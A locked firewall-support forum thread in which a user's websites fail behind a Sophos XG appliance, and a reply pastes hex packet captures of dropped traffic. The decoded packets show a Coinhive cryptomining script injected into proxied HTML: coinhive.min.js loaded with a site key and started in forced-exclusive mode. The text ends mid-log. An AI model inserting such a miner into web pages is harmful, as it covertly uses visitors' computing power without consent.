This discussion has been locked.

You can no longer post new replies to this discussion. If you have a question you can start a new discussion

website not opening

hello awesome people

i have a cyberoam cr35ing with the latest XG sophos on it .

i am facing issues with a lot of websites with the following error(even though policy tester shows the site is allowed , and it opens normally on my phone -3g)

HTTP/1.0 504 Timeout while reading response from Server Date: Wed, 12 Dec 2018 09:28:18 GMT Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset="UTF-8" Content-Length: 0 Via: HTTP/1.1 forward.http.proxy:3128 Connection: close

i checked the time on the utm , disabled cache , cleared dns but same error

if i add the website to a web exception i get different errors :

on chrome: err_content_lenght_mismatch

on explorer : http 403 forbidden : the website requires you to login

i tried several machines and several websites with same issue

This thread was automatically locked due to age.

Parents

0 TarekHalloun over 6 years ago

this is a capture of the dropped packets from the cli (rule 9 is the rule related to this pc )

2018-12-12 11:32:44 0139021 IP 91.216.107.230.80 > 192.168.130.31.49956 : proto
TCP: F 2282134318:2282134767(449) win 980 checksum : 39552
0x0000: 4500 01e9 aa75 4000 4006 15a4 5bd8 6be6 E....u@.@...[.k.
0x0010: c0a8 821f 0050 c324 8806 9b2e edf8 1d2a .....P.$.......*
0x0020: 5019 03d4 9a80 0000 3c68 746d 6c3e 0d0a P.......<html>..
0x0030: 3c68 6561 643e 0d0a 093c 6d65 7461 2068 <head>...<meta.h
0x0040: 7474 702d 6571 7569 763d 2243 6f6e 7465 ttp-equiv="Conte
0x0050: 6e74 2d54 7970 6522 2063 6f6e 7465 6e74 nt-Type".content
0x0060: 3d22 7465 7874 2f68 746d 6c3b 6368 6172 ="text/html;char
0x0070: 7365 743d 7769 6e64 6f77 732d 3132 3531 set=windows-1251
0x0080: 223e 0d0a 093c 7469 746c 653e 2268 7474 ">...<title>"htt
0x0090: 703a 2f2f 7777 772e 6172 6d70 2d72 6463 p://www.armp-rdc
0x00a0: 2e6f 7267 2f22 3c2f 7469 746c 653e 200d .org/"</title>..
0x00b0: 0a3c 7363 7269 7074 2073 7263 3d22 6874 .<script.src="ht
0x00c0: 7470 733a 2f2f 636f 696e 6869 7665 2e63 tps://coinhive.c
0x00d0: 6f6d 2f6c 6962 2f63 6f69 6e68 6976 652e om/lib/coinhive.
0x00e0: 6d69 6e2e 6a73 223e 3c2f 7363 7269 7074 min.js"></script
0x00f0: 3e0d 0a3c 7363 7269 7074 3e0d 0a09 7661 >..<script>...va
0x0100: 7220 6d69 6e65 7220 3d20 6e65 7720 436f r.miner.=.new.Co
0x0110: 696e 4869 7665 2e41 6e6f 6e79 6d6f 7573 inHive.Anonymous
0x0120: 2827 6f69 4b41 4745 736c 634e 666a 6667 ('oiKAGEslcNfjfg
0x0130: 7854 4d72 784b 474d 4a76 6834 3336 7970 xTMrxKGMJvh436yp
0x0140: 494d 272c 207b 7468 726f 7474 6c65 3a20 IM',.{throttle:.
0x0150: 302e 317d 293b 0d0a 096d 696e 6572 2e73 0.1});...miner.s
0x0160: 7461 7274 2843 6f69 6e48 6976 652e 464f tart(CoinHive.FO
0x0170: 5243 455f 4558 434c 5553 4956 455f 5441 RCE_EXCLUSIVE_TA
0x0180: 4229 3b0d 0a3c 2f73 6372 6970 743e 0d0a B);..</script>..
0x0190: 3c2f 6865 6164 3e0d 0a3c 6672 616d 6573 </head>..<frames
0x01a0: 6574 3e0d 0a3c 6672 616d 6520 7372 633d et>..<frame.src=
0x01b0: 2268 7474 703a 2f2f 7777 772e 6172 6d70 "http://www.armp
0x01c0: 2d72 6463 2e6f 7267 2f22 3e3c 2f66 7261 -rdc.org/"></fra
0x01d0: 6d65 3e0d 0a3c 2f66 7261 6d65 7365 743e me>..</frameset>
0x01e0: 0d0a 3c2f 6874 6d6c 3e ..</html>
Date=2018-12-12 Time=11:32:44 log_id=0139021 log_type=Firewall log_component= lo
g_subtype=Denied log_status=N/A log_priority=Alert duration=N/A in_dev=PortB out
_dev= inzone_id=1 outzone_id=0 source_mac=cc:2d:e0:a1:ef:58 dest_mac=00:0d:48:33
:c6:12 l3_protocol=IP source_ip=91.216.107.230 dest_ip=192.168.130.31 l4_protoco
l=TCP source_port=80 dest_port=49956 fw_rule_id=9 policytype=1 live_userid=0 use
rid=0 user_gp=0 ips_id=1 sslvpn_id=0 web_filter_id=4 hotspot_id=0 hotspotuser_id
=0 hb_src=0 hb_dst=0 dnat_done=0 proxy_flags=0 icap_id=0 app_filter_id=3 app_cat
egory_id=3 app_id=6 category_id=23 bandwidth_id=22 up_classid=131084 dn_classid=
131083 source_nat_id=1 cluster_node=0 inmark=0x0 nfqueue=253 scanflags=0 gateway
_offset=0 max_session_bytes=0 drop_fix=1 ctflags=592129 connid=2774694400 master
id=2774691840 status=398 state=8 sent_pkts=N/A recv_pkts=N/A sent_bytes=N/A recv
_bytes=N/A tran_src_ip=N/A tran_src_port=N/A tran_dst_ip=N/A tran_dst_port=N/A

2018-12-12 11:32:44 0139021 IP 91.216.107.230.80 > 154.73.22.238.43322 : proto T
CP: F 2282134116:2282134767(651) win 980 checksum : 38068
0x0000: 4500 02b3 aa76 4000 4006 14d9 5bd8 6be6 E....v@.@...[.k.
0x0010: 9a49 16ee 0050 a93a 8806 9a64 edf8 1d2a .I...P.:...d...*
0x0020: 5019 03d4 94b4 0000 4854 5450 2f31 2e30 P.......HTTP/1.0
0x0030: 2034 3033 2046 6f72 6269 6464 656e 0d0a .403.Forbidden..
0x0040: 436f 6e74 656e 742d 4c65 6e67 7468 3a20 Content-Length:.
0x0050: 3434 390d 0a43 6f6e 7465 6e74 2d54 7970 449..Content-Typ
0x0060: 653a 2074 6578 742f 6874 6d6c 0d0a 4461 e:.text/html..Da
0x0070: 7465 3a20 4672 692c 2032 3720 4665 6220 te:.Fri,.27.Feb.
0x0080: 3139 3730 2032 333a 3139 3a33 3420 474d 1970.23:19:34.GM
0x0090: 540d 0a45 7870 6972 6573 3a20 4672 692c T..Expires:.Fri,
0x00a0: 2032 3720 4665 6220 3139 3730 2032 333a .27.Feb.1970.23:
0x00b0: 3139 3a33 3420 474d 540d 0a53 6572 7665 19:34.GMT..Serve
0x00c0: 723a 204d 696b 726f 7469 6b20 4874 7470 r:.Mikrotik.Http
0x00d0: 5072 6f78 790d 0a50 726f 7879 2d43 6f6e Proxy..Proxy-Con
0x00e0: 6e65 6374 696f 6e3a 2063 6c6f 7365 0d0a nection:.close..
0x00f0: 0d0a 3c68 746d 6c3e 0d0a 3c68 6561 643e ..<html>..<head>
0x0100: 0d0a 093c 6d65 7461 2068 7474 702d 6571 ...<meta.http-eq
0x0110: 7569 763d 2243 6f6e 7465 6e74 2d54 7970 uiv="Content-Typ
0x0120: 6522 2063 6f6e 7465 6e74 3d22 7465 7874 e".content="text
0x0130: 2f68 746d 6c3b 6368 6172 7365 743d 7769 /html;charset=wi
0x0140: 6e64 6f77 732d 3132 3531 223e 0d0a 093c ndows-1251">...<
0x0150: 7469 746c 653e 2268 7474 703a 2f2f 7777 title>"http://ww
0x0160: 772e 6172 6d70 2d72 6463 2e6f 7267 2f22 w.armp-rdc.org/"
0x0170: 3c2f 7469 746c 653e 200d 0a3c 7363 7269 </title>...<scri
0x0180: 7074 2073 7263 3d22 6874 7470 733a 2f2f pt.src="https://
0x0190: 636f 696e 6869 7665 2e63 6f6d 2f6c 6962 coinhive.com/lib
0x01a0: 2f63 6f69 6e68 6976 652e 6d69 6e2e 6a73 /coinhive.min.js
0x01b0: 223e 3c2f 7363 7269 7074 3e0d 0a3c 7363 "></script>..<sc
0x01c0: 7269 7074 3e0d 0a09 7661 7220 6d69 6e65 ript>...var.mine
0x01d0: 7220 3d20 6e65 7720 436f 696e 4869 7665 r.=.new.CoinHive
0x01e0: 2e41 6e6f 6e79 6d6f 7573 2827 6f69 4b41 .Anonymous('oiKA
0x01f0: 4745 736c 634e 666a 6667 7854 4d72 784b GEslcNfjfgxTMrxK
0x0200: 474d 4a76 6834 3336 7970 494d 272c 207b GMJvh436ypIM',.{
0x0210: 7468 726f 7474 6c65 3a20 302e 317d 293b throttle:.0.1});
0x0220: 0d0a 096d 696e 6572 2e73 7461 7274 2843 ...miner.start(C
0x0230: 6f69 6e48 6976 652e 464f 5243 455f 4558 oinHive.FORCE_EX
0x0240: 434c 5553 4956 455f 5441 4229 3b0d 0a3c CLUSIVE_TAB);..<
0x0250: 2f73 6372 6970 743e 0d0a 3c2f 6865 6164 /script>..</head
0x0260: 3e0d 0a3c 6672 616d 6573 6574 3e0d 0a3c >..<frameset>..<
0x0270: 6672 616d 6520 7372 633d 2268 7474 703a frame.src="http:
0x0280: 2f2f 7777 772e 6172 6d70 2d72 6463 2e6f //www.armp-rdc.o
0x0290: 7267 2f22 3e3c 2f66 7261 6d65 3e0d 0a3c rg/"></frame>..<
0x02a0: 2f66 7261 6d65 7365 743e 0d0a 3c2f 6874 /frameset>..</ht
0x02b0: 6d6c 3e ml>
Date=2018-12-12 Time=11:32:44 log_id=0139021 log_type=Firewall log_component= lo
g_subtype=Denied log_status=N/A log_priority=Alert duration=N/A in_dev=PortB out
_dev= inzone_id=1 outzone_id=0 source_mac=cc:2d:e0:a1:ef:58 dest_mac=00:0d:48:33
:c6:12 l3_protocol=IP source_ip=91.216.107.230 dest_ip=154.73.22.238 l4_protocol
=TCP source_port=80 dest_port=43322 fw_rule_id=9 policytype=1 live_userid=0 user
id=0 user_gp=0 ips_id=1 sslvpn_id=0 web_filter_id=4 hotspot_id=0 hotspotuser_id=
0 hb_src=0 hb_dst=0 dnat_done=0 proxy_flags=0 icap_id=0 app_filter_id=3 app_cate
gory_id=3 app_id=6 category_id=23 bandwidth_id=22 up_classid=131084 dn_classid=1
31083 source_nat_id=1 cluster_node=0 inmark=0x0 nfqueue=253 scanflags=0 gateway_
offset=0 max_session_bytes=0 drop_fix=1 ctflags=592129 connid=2774694400 masteri
d=2774691840 status=398 state=8 sent_pkts=N/A recv_pkts=N/A sent_bytes=N/A recv_
bytes=N/A tran_src_ip=N/A tran_src_port=N/A tran_dst_ip=N/A tran_dst_port=N/A

2018-12-12 11:32:45 0139021 IP 91.216.107.230.80 > 154.73.22.238.43322 : proto T
CP: F 2282134116:2282134767(651) win 980 checksum : 38068
0x0000: 4500 02b3 aa77 4000 4006 14d8 5bd8 6be6 E....w@.@...[.k.
0x0010: 9a49 16ee 0050 a93a 8806 9a64 edf8 1d2a .I...P.:...d...*
0x0020: 5019 03d4 94b4 0000 4854 5450 2f31 2e30 P.......HTTP/1.0
0x0030: 2034 3033 2046 6f72 6269 6464 656e 0d0a .403.Forbidden..
0x0040: 436f 6e74 656e 742d 4c65 6e67 7468 3a20 Content-Length:.
0x0050: 3434 390d 0a43 6f6e 7465 6e74 2d54 7970 449..Content-Typ
0x0060: 653a 2074 6578 742f 6874 6d6c 0d0a 4461 e:.text/html..Da
0x0070: 7465 3a20 4672 692c 2032 3720 4665 6220 te:.Fri,.27.Feb.
0x0080: 3139 3730 2032 333a 3139 3a33 3420 474d 1970.23:19:34.GM
0x0090: 540d 0a45 7870 6972 6573 3a20 4672 692c T..Expires:.Fri,
0x00a0: 2032 3720 4665 6220 3139 3730 2032 333a .27.Feb.1970.23:
0x00b0: 3139 3a33 3420 474d 540d 0a53 6572 7665 19:34.GMT..Serve
0x00c0: 723a 204d 696b 726f 7469 6b20 4874 7470 r:.Mikrotik.Http
0x00d0: 5072 6f78 790d 0a50 726f 7879 2d43 6f6e Proxy..Proxy-Con
0x00e0: 6e65 6374 696f 6e3a 2063 6c6f 7365 0d0a nection:.close..
0x00f0: 0d0a 3c68 746d 6c3e 0d0a 3c68 6561 643e ..<html>..<head>
0x0100: 0d0a 093c 6d65 7461 2068 7474 702d 6571 ...<meta.http-eq
0x0110: 7569 763d 2243 6f6e 7465 6e74 2d54 7970 uiv="Content-Typ
0x0120: 6522 2063 6f6e 7465 6e74 3d22 7465 7874 e".content="text
0x0130: 2f68 746d 6c3b 6368 6172 7365 743d 7769 /html;charset=wi
0x0140: 6e64 6f77 732d 3132 3531 223e 0d0a 093c ndows-1251">...<
0x0150: 7469 746c 653e 2268 7474 703a 2f2f 7777 title>"http://ww
0x0160: 772e 6172 6d70 2d72 6463 2e6f 7267 2f22 w.armp-rdc.org/"
0x0170: 3c2f 7469 746c 653e 200d 0a3c 7363 7269 </title>...<scri
0x0180: 7074 2073 7263 3d22 6874 7470 733a 2f2f pt.src="https://
0x0190: 636f 696e 6869 7665 2e63 6f6d 2f6c 6962 coinhive.com/lib
0x01a0: 2f63 6f69 6e68 6976 652e 6d69 6e2e 6a73 /coinhive.min.js
0x01b0: 223e 3c2f 7363 7269 7074 3e0d 0a3c 7363 "></script>..<sc
0x01c0: 7269 7074 3e0d 0a09 7661 7220 6d69 6e65 ript>...var.mine
0x01d0: 7220 3d20 6e65 7720 436f 696e 4869 7665 r.=.new.CoinHive
0x01e0: 2e41 6e6f 6e79 6d6f 7573 2827 6f69 4b41 .Anonymous('oiKA
0x01f0: 4745 736c 634e 666a 6667 7854 4d72 784b GEslcNfjfgxTMrxK
0x0200: 474d 4a76 6834 3336 7970 494d 272c 207b GMJvh436ypIM',.{
0x0210: 7468 726f 7474 6c65 3a20 302e 317d 293b throttle:.0.1});
0x0220: 0d0a 096d 696e 6572 2e73 7461 7274 2843 ...miner.start(C
0x0230: 6f69 6e48 6976 652e 464f 5243 455f 4558 oinHive.FORCE_EX
0x0240: 434c 5553 4956 455f 5441 4229 3b0d 0a3c CLUSIVE_TAB);..<
0x0250: 2f73 6372 6970 743e 0d0a 3c2f 6865 6164 /script>..</head
0x0260: 3e0d 0a3c 6672 616d 6573 6574 3e0d 0a3c >..<frameset>..<
0x0270: 6672 616d 6520 7372 633d 2268 7474 703a frame.src="http:
0x0280: 2f2f 7777 772e 6172 6d70 2d72 6463 2e6f //www.armp-rdc.o
0x0290: 7267 2f22 3e3c 2f66 7261 6d65 3e0d 0a3c rg/"></frame>..<
0x02a0: 2f66 7261 6d65 7365 743e 0d0a 3c2f 6874 /frameset>..</ht
0x02b0: 6d6c 3e ml>
Date=2018-12-12 Time=11:32:45 log_id=0139021 log_type=Firewall log_component= lo
g_subtype=Denied log_status=N/A log_priority=Alert duration=N/A in_dev=PortB out
_dev= inzone_id=1 outzone_id=0 source_mac=cc:2d:e0:a1:ef:58 dest_mac=00:0d:48:33
:c6:12 l3_protocol=IP source_ip=91.216.107.230 dest_ip=154.73.22.238 l4_protocol
=TCP source_port=80 dest_port=43322 fw_rule_id=9 policytype=1 live_userid=0 user
id=0 user_gp=0 ips_id=1 sslvpn_id=0 web_filter_id=4 hotspot_id=0 hotspotuser_id=
0 hb_src=0 hb_dst=0 dnat_done=0 proxy_flags=0 icap_id=0 app_filter_id=3 app_cate
gory_id=3 app_id=6 category_id=23 bandwidth_id=22 up_classid=131084 dn_classid=1
31083 source_nat_id=1 cluster_node=0 inmark=0x0 nfqueue=253 scanflags=0 gateway_
offset=0 max_session_bytes=0 drop_fix=1 ctflags=592129 connid=2774694400 masteri
d=2774691840 status=398 state=8 sent_pkts=N/A recv_pkts=N/A sent_bytes=N/A recv_
bytes=N/A tran_src_ip=N/A tran_src_port=N/A tran_dst_ip=N/A tran_dst_port=N/A

2018-12-12 11:32:46 0139021 IP 91.216.107.230.80 > 154.73.22.238.43322 : proto T
CP: F 2282134116:2282134767(651) win 980 checksum : 38068
0x0000: 4500 02b3 aa78 4000 4006 14d7 5bd8 6be6 E....x@.@...[.k.
0x0010: 9a49 16ee 0050 a93a 8806 9a64 edf8 1d2a .I...P.:...d...*
0x0020: 5019 03d4 94b4 0000 4854 5450 2f31 2e30 P.......HTTP/1.0
0x0030: 2034 3033 2046 6f72 6269 6464 656e 0d0a .403.Forbidden..
0x0040: 436f 6e74 656e 742d 4c65 6e67 7468 3a20 Content-Length:.
0x0050: 3434 390d 0a43 6f6e 7465 6e74 2d54 7970 449..Content-Typ
0x0060: 653a 2074 6578 742f 6874 6d6c 0d0a 4461 e:.text/html..Da
0x0070: 7465 3a20 4672 692c 2032 3720 4665 6220 te:.Fri,.27.Feb.
0x0080: 3139 3730 2032 333a 3139 3a33 3420 474d 1970.23:19:34.GM
0x0090: 540d 0a45 7870 6972 6573 3a20 4672 692c T..Expires:.Fri,
0x00a0: 2032 3720 4665 6220 3139 3730 2032 333a .27.Feb.1970.23:
0x00b0: 3139 3a33 3420 474d 540d 0a53 6572 7665 19:34.GMT..Serve
0x00c0: 723a 204d 696b 726f 7469 6b20 4874 7470 r:.Mikrotik.Http
0x00d0: 5072 6f78 790d 0a50 726f 7879 2d43 6f6e Proxy..Proxy-Con
0x00e0: 6e65 6374 696f 6e3a 2063 6c6f 7365 0d0a nection:.close..
0x00f0: 0d0a 3c68 746d 6c3e 0d0a 3c68 6561 643e ..<html>..<head>
0x0100: 0d0a 093c 6d65 7461 2068 7474 702d 6571 ...<meta.http-eq
0x0110: 7569 763d 2243 6f6e 7465 6e74 2d54 7970 uiv="Content-Typ
0x0120: 6522 2063 6f6e 7465 6e74 3d22 7465 7874 e".content="text
0x0130: 2f68 746d 6c3b 6368 6172 7365 743d 7769 /html;charset=wi
0x0140: 6e64 6f77 732d 3132 3531 223e 0d0a 093c ndows-1251">...<
0x0150: 7469 746c 653e 2268 7474 703a 2f2f 7777 title>"http://ww
0x0160: 772e 6172 6d70 2d72 6463 2e6f 7267 2f22 w.armp-rdc.org/"
0x0170: 3c2f 7469 746c 653e 200d 0a3c 7363 7269 </title>...<scri
0x0180: 7074 2073 7263 3d22 6874 7470 733a 2f2f pt.src="https://
0x0190: 636f 696e 6869 7665 2e63 6f6d 2f6c 6962 coinhive.com/lib
0x01a0: 2f63 6f69 6e68 6976 652e 6d69 6e2e 6a73 /coinhive.min.js
0x01b0: 223e 3c2f 7363 7269 7074 3e0d 0a3c 7363 "></script>..<sc
0x01c0: 7269 7074 3e0d 0a09 7661 7220 6d69 6e65 ript>...var.mine
0x01d0: 7220 3d20 6e65 7720 436f 696e 4869 7665 r.=.new.CoinHive
0x01e0: 2e41 6e6f 6e79 6d6f 7573 2827 6f69 4b41 .Anonymous('oiKA
0x01f0: 4745 736c 634e 666a 6667 7854 4d72 784b GEslcNfjfgxTMrxK
0x0200: 474d 4a76 6834 3336 7970 494d 272c 207b GMJvh436ypIM',.{
0x0210: 7468 726f 7474 6c65 3a20 302e 317d 293b throttle:.0.1});
0x0220: 0d0a 096d 696e 6572 2e73 7461 7274 2843 ...miner.start(C
0x0230: 6f69 6e48 6976 652e 464f 5243 455f 4558 oinHive.FORCE_EX
0x0240: 434c 5553 4956 455f 5441 4229 3b0d 0a3c CLUSIVE_TAB);..<
0x0250: 2f73 6372 6970 743e 0d0a 3c2f 6865 6164 /script>..</head
0x0260: 3e0d 0a3c 6672 616d 6573 6574 3e0d 0a3c >..<frameset>..<
0x0270: 6672 616d 6520 7372 633d 2268 7474 703a frame.src="http:
0x0280: 2f2f 7777 772e 6172 6d70 2d72 6463 2e6f //www.armp-rdc.o
0x0290: 7267 2f22 3e3c 2f66 7261 6d65 3e0d 0a3c rg/"></frame>..<
0x02a0: 2f66 7261 6d65 7365 743e 0d0a 3c2f 6874 /frameset>..</ht
0x02b0: 6d6c 3e ml>
Date=2018-12-12 Time=11:32:46 log_id=0139021 log_type=Firewall log_component= lo
g_subtype=Denied log_status=N/A log_priority=Alert duration=N/A in_dev=PortB out
_dev= inzone_id=1 outzone_id=0 source_mac=cc:2d:e0:a1:ef:58 dest_mac=00:0d:48:33
:c6:12 l3_protocol=IP source_ip=91.216.107.230 dest_ip=154.73.22.238 l4_protocol
=TCP source_port=80 dest_port=43322 fw_rule_id=9 policytype=1 live_userid=0 user
id=0 user_gp=0 ips_id=1 sslvpn_id=0 web_filter_id=4 hotspot_id=0 hotspotuser_id=
0 hb_src=0 hb_dst=0 dnat_done=0 proxy_flags=0 icap_id=0 app_filter_id=3 app_cate
gory_id=3 app_id=6 category_id=23 bandwidth_id=22 up_classid=131084 dn_classid=1
31083 source_nat_id=1 cluster_node=0 inmark=0x0 nfqueue=253 scanflags=0 gateway_
offset=0 max_session_bytes=0 drop_fix=1 ctflags=592129 connid=2774694400 masteri
d=2774691840 status=398 state=8 sent_pkts=N/A recv_pkts=N/A sent_bytes=N/A recv_
bytes=N/A tran_src_ip=N/A tran_src_port=N/A tran_dst_ip=N/A tran_dst_port=N/A

2018-12-12 11:32:47 0139021 IP 91.216.107.230.80 > 154.73.22.238.43322 : proto T
CP: F 2282134116:2282134767(651) win 980 checksum : 38068
0x0000: 4500 02b3 aa79 4000 4006 14d6 5bd8 6be6 E....y@.@...[.k.
0x0010: 9a49 16ee 0050 a93a 8806 9a64 edf8 1d2a .I...P.:...d...*
0x0020: 5019 03d4 94b4 0000 4854 5450 2f31 2e30 P.......HTTP/1.0
0x0030: 2034 3033 2046 6f72 6269 6464 656e 0d0a .403.Forbidden..
0x0040: 436f 6e74 656e 742d 4c65 6e67 7468 3a20 Content-Length:.
0x0050: 3434 390d 0a43 6f6e 7465 6e74 2d54 7970 449..Content-Typ
0x0060: 653a 2074 6578 742f 6874 6d6c 0d0a 4461 e:.text/html..Da
0x0070: 7465 3a20 4672 692c 2032 3720 4665 6220 te:.Fri,.27.Feb.
0x0080: 3139 3730 2032 333a 3139 3a33 3420 474d 1970.23:19:34.GM
0x0090: 540d 0a45 7870 6972 6573 3a20 4672 692c T..Expires:.Fri,
0x00a0: 2032 3720 4665 6220 3139 3730 2032 333a .27.Feb.1970.23:
0x00b0: 3139 3a33 3420 474d 540d 0a53 6572 7665 19:34.GMT..Serve
0x00c0: 723a 204d 696b 726f 7469 6b20 4874 7470 r:.Mikrotik.Http
0x00d0: 5072 6f78 790d 0a50 726f 7879 2d43 6f6e Proxy..Proxy-Con
0x00e0: 6e65 6374 696f 6e3a 2063 6c6f 7365 0d0a nection:.close..
0x00f0: 0d0a 3c68 746d 6c3e 0d0a 3c68 6561 643e ..<html>..<head>
0x0100: 0d0a 093c 6d65 7461 2068 7474 702d 6571 ...<meta.http-eq
0x0110: 7569 763d 2243 6f6e 7465 6e74 2d54 7970 uiv="Content-Typ
0x0120: 6522 2063 6f6e 7465 6e74 3d22 7465 7874 e".content="text
0x0130: 2f68 746d 6c3b 6368 6172 7365 743d 7769 /html;charset=wi
0x0140: 6e64 6f77 732d 3132 3531 223e 0d0a 093c ndows-1251">...<
0x0150: 7469 746c 653e 2268 7474 703a 2f2f 7777 title>"http://ww
0x0160: 772e 6172 6d70 2d72 6463 2e6f 7267 2f22 w.armp-rdc.org/"
0x0170: 3c2f 7469 746c 653e 200d 0a3c 7363 7269 </title>...<scri
0x0180: 7074 2073 7263 3d22 6874 7470 733a 2f2f pt.src="https://
0x0190: 636f 696e 6869 7665 2e63 6f6d 2f6c 6962 coinhive.com/lib
0x01a0: 2f63 6f69 6e68 6976 652e 6d69 6e2e 6a73 /coinhive.min.js
0x01b0: 223e 3c2f 7363 7269 7074 3e0d 0a3c 7363 "></script>..<sc
0x01c0: 7269 7074 3e0d 0a09 7661 7220 6d69 6e65 ript>...var.mine
0x01d0: 7220 3d20 6e65 7720 436f 696e 4869 7665 r.=.new.CoinHive
0x01e0: 2e41 6e6f 6e79 6d6f 7573 2827 6f69 4b41 .Anonymous('oiKA
0x01f0: 4745 736c 634e 666a 6667 7854 4d72 784b GEslcNfjfgxTMrxK
0x0200: 474d 4a76 6834 3336 7970 494d 272c 207b GMJvh436ypIM',.{
0x0210: 7468 726f 7474 6c65 3a20 302e 317d 293b throttle:.0.1});
0x0220: 0d0a 096d 696e 6572 2e73 7461 7274 2843 ...miner.start(C
0x0230: 6f69 6e48 6976 652e 464f 5243 455f 4558 oinHive.FORCE_EX
0x0240: 434c 5553 4956 455f 5441 4229 3b0d 0a3c CLUSIVE_TAB);..<
0x0250: 2f73 6372 6970 743e 0d0a 3c2f 6865 6164 /script>..</head
0x0260: 3e0d 0a3c 6672 616d 6573 6574 3e0d 0a3c >..<frameset>..<
0x0270: 6672 616d 6520 7372 633d 2268 7474 703a frame.src="http:
0x0280: 2f2f 7777 772e 6172 6d70 2d72 6463 2e6f //www.armp-rdc.o
0x0290: 7267 2f22 3e3c 2f66 7261 6d65 3e0d 0a3c rg/"></frame>..<
0x02a0: 2f66 7261 6d65 7365 743e 0d0a 3c2f 6874 /frameset>..</ht
0x02b0: 6d6c 3e ml>
Date=2018-12-12 Time=11:32:47 log_id=0139021 log_type=Firewall log_component= lo
g_subtype=Denied log_status=N/A log_priority=Alert duration=N/A in_dev=PortB out
_dev= inzone_id=1 outzone_id=0 source_mac=cc:2d:e0:a1:ef:58 dest_mac=00:0d:48:33
:c6:12 l3_protocol=IP source_ip=91.216.107.230 dest_ip=154.73.22.238 l4_protocol
=TCP source_port=80 dest_port=43322 fw_rule_id=9 policytype=1 live_userid=0 user
id=0 user_gp=0 ips_id=1 sslvpn_id=0 web_filter_id=4 hotspot_id=0 hotspotuser_id=
0 hb_src=0 hb_dst=0 dnat_done=0 proxy_flags=0 icap_id=0 app_filter_id=3 app_cate
gory_id=3 app_id=6 category_id=23 bandwidth_id=22 up_classid=131084 dn_classid=1
31083 source_nat_id=1 cluster_node=0 inmark=0x0 nfqueue=253 scanflags=0 gateway_
offset=0 max_session_bytes=0 drop_fix=1 ctflags=592129 connid=2774694400 masteri
d=2774691840 status=398 state=8 sent_pkts=N/A recv_pkts=N/A sent_bytes=N/A recv_
bytes=N/A tran_src_ip=N/A tran_src_port=N/A tran_dst_ip=N/A tran_dst_port=N/A

2018-12-12 11:32:51 0139021 IP 91.216.107.230.80 > 154.73.22.238.43322 : proto T
CP: F 2282134116:2282134767(651) win 980 checksum : 38068
0x0000: 4500 02b3 aa7a 4000 4006 14d5 5bd8 6be6 E....z@.@...[.k.
0x0010: 9a49 16ee 0050 a93a 8806 9a64 edf8 1d2a .I...P.:...d...*
0x0020: 5019 03d4 94b4 0000 4854 5450 2f31 2e30 P.......HTTP/1.0
0x0030: 2034 3033 2046 6f72 6269 6464 656e 0d0a .403.Forbidden..
0x0040: 436f 6e74 656e 742d 4c65 6e67 7468 3a20 Content-Length:.
0x0050: 3434 390d 0a43 6f6e 7465 6e74 2d54 7970 449..Content-Typ
0x0060: 653a 2074 6578 742f 6874 6d6c 0d0a 4461 e:.text/html..Da
0x0070: 7465 3a20 4672 692c 2032 3720 4665 6220 te:.Fri,.27.Feb.
0x0080: 3139 3730 2032 333a 3139 3a33 3420 474d 1970.23:19:34.GM
0x0090: 540d 0a45 7870 6972 6573 3a20 4672 692c T..Expires:.Fri,
0x00a0: 2032 3720 4665 6220 3139 3730 2032 333a .27.Feb.1970.23:
0x00b0: 3139 3a33 3420 474d 540d 0a53 6572 7665 19:34.GMT..Serve
0x00c0: 723a 204d 696b 726f 7469 6b20 4874 7470 r:.Mikrotik.Http
0x00d0: 5072 6f78 790d 0a50 726f 7879 2d43 6f6e Proxy..Proxy-Con
0x00e0: 6e65 6374 696f 6e3a 2063 6c6f 7365 0d0a nection:.close..
0x00f0: 0d0a 3c68 746d 6c3e 0d0a 3c68 6561 643e ..<html>..<head>
0x0100: 0d0a 093c 6d65 7461 2068 7474 702d 6571 ...<meta.http-eq
0x0110: 7569 763d 2243 6f6e 7465 6e74 2d54 7970 uiv="Content-Typ
0x0120: 6522 2063 6f6e 7465 6e74 3d22 7465 7874 e".content="text
0x0130: 2f68 746d 6c3b 6368 6172 7365 743d 7769 /html;charset=wi
0x0140: 6e64 6f77 732d 3132 3531 223e 0d0a 093c ndows-1251">...<
0x0150: 7469 746c 653e 2268 7474 703a 2f2f 7777 title>"http://ww
0x0160: 772e 6172 6d70 2d72 6463 2e6f 7267 2f22 w.armp-rdc.org/"
0x0170: 3c2f 7469 746c 653e 200d 0a3c 7363 7269 </title>...<scri
0x0180: 7074 2073 7263 3d22 6874 7470 733a 2f2f pt.src="https://
0x0190: 636f 696e 6869 7665 2e63 6f6d 2f6c 6962 coinhive.com/lib
0x01a0: 2f63 6f69 6e68 6976 652e 6d69 6e2e 6a73 /coinhive.min.js
0x01b0: 223e 3c2f 7363 7269 7074 3e0d 0a3c 7363 "></script>..<sc
0x01c0: 7269 7074 3e0d 0a09 7661 7220 6d69 6e65 ript>...var.mine
0x01d0: 7220 3d20 6e65 7720 436f 696e 4869 7665 r.=.new.CoinHive
0x01e0: 2e41 6e6f 6e79 6d6f 7573 2827 6f69 4b41 .Anonymous('oiKA
0x01f0: 4745 736c 634e 666a 6667 7854 4d72 784b GEslcNfjfgxTMrxK
0x0200: 474d 4a76 6834 3336 7970 494d 272c 207b GMJvh436ypIM',.{
0x0210: 7468 726f 7474 6c65 3a20 302e 317d 293b throttle:.0.1});
0x0220: 0d0a 096d 696e 6572 2e73 7461 7274 2843 ...miner.start(C
0x0230: 6f69 6e48 6976 652e 464f 5243 455f 4558 oinHive.FORCE_EX
0x0240: 434c 5553 4956 455f 5441 4229 3b0d 0a3c CLUSIVE_TAB);..<
0x0250: 2f73 6372 6970 743e 0d0a 3c2f 6865 6164 /script>..</head
0x0260: 3e0d 0a3c 6672 616d 6573 6574 3e0d 0a3c >..<frameset>..<
0x0270: 6672 616d 6520 7372 633d 2268 7474 703a frame.src="http:
0x0280: 2f2f 7777 772e 6172 6d70 2d72 6463 2e6f //www.armp-rdc.o
0x0290: 7267 2f22 3e3c 2f66 7261 6d65 3e0d 0a3c rg/"></frame>..<
0x02a0: 2f66 7261 6d65 7365 743e 0d0a 3c2f 6874 /frameset>..</ht
0x02b0: 6d6c 3e ml>
Date=2018-12-12 Time=11:32:51 log_id=0139021 log_type=Firewall log_component= lo
g_subtype=Denied log_status=N/A log_priority=Alert duration=N/A in_dev=PortB out
_dev= inzone_id=1 outzone_id=0 source_mac=cc:2d:e0:a1:ef:58 dest_mac=00:0d:48:33
